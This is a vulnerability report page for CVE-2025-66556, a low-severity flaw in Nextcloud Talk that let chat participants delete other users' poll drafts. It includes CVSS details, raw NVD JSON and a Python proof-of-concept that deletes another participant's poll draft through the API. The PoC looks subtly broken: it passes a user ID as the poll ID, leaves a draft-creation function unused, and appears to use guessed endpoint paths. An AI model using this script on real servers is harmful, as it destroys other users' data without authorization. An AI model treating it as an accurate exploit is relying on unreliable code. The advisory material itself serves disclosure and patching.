Security Vulnerability Report
中文
CVE-2025-66556 CVSS 3.5 LOW

CVE-2025-66556

Published: 2025-12-05 18:15:59
Last Modified: 2025-12-09 16:52:35
Source: [email protected]

Description

Nextcloud talk is a video & audio conferencing app for Nextcloud. Prior to 20.1.8 and 21.1.2, a participant with chat permissions was able to delete poll drafts of other participants within the conversation based on their numeric ID. This vulnerability is fixed in 20.1.8 and 21.1.2.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Talk < 20.1.8
Nextcloud Talk < 21.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66556 PoC - Nextcloud Talk Poll Draft Deletion # Requires: Valid session with chat permission, target user's numeric ID import requests import json # Configuration NEXTCLOUD_URL = "https://your-nextcloud-instance" SESSION_TOKEN = "your-session-token" CONVERSATION_TOKEN = "conversation-token-here" TARGET_USER_ID = 12345 # Numeric ID of target user # Step 1: Get list of participants to find target user ID def get_participants(): url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/conversations/{CONVERSATION_TOKEN}/participants" headers = { "OCS-APIREQUEST": "true", "Authorization": f"Bearer {SESSION_TOKEN}" } response = requests.get(url, headers=headers) return response.json() # Step 2: Create a poll draft (as target user - simulated) def create_poll_draft(): url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/polls" headers = { "OCS-APIREQUEST": "true", "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } data = { "conversationToken": CONVERSATION_TOKEN, "question": "Test Poll", "options": ["Option 1", "Option 2"], "draft": True } response = requests.post(url, headers=headers, json=data) return response.json() # Step 3: Delete other user's poll draft (VULNERABILITY) def delete_other_user_poll_draft(poll_id): url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/polls/{poll_id}" headers = { "OCS-APIREQUEST": "true", "Authorization": f"Bearer {SESSION_TOKEN}" } # The vulnerability: no ownership verification response = requests.delete(url, headers=headers) return response.status_code == 200 # Main execution if __name__ == "__main__": print("Fetching participants...") participants = get_participants() print(f"Found {len(participants.get('ocs', {}).get('data', []))} participants") print("\nDeleting target user's poll draft...") success = delete_other_user_poll_draft(TARGET_USER_ID) print(f"Poll deletion {'successful' if success else 'failed'}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66556", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.803", "lastModified": "2025-12-09T16:52:34.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud talk is a video & audio conferencing app for Nextcloud. Prior to 20.1.8 and 21.1.2, a participant with chat permissions was able to delete poll drafts of other participants within the conversation based on their numeric ID. This vulnerability is fixed in 20.1.8 and 21.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.0.0", "versionEndExcluding": "20.1.8", "matchCriteriaId": "5D5909D1-F39C-4C41-906C-2D2A7C830F0A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0.0", "versionEndExcluding": "21.1.2", "matchCriteriaId": "D2E99EC0-4563-4497-A72C-52C97089F7E1"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-pr9f-vqgg-m2jh", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/spreed/commit/bd68e80d1dea98d84c1d621c2c681238cf041725", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/spreed/pull/15532", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://hackerone.com/reports/3247386", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.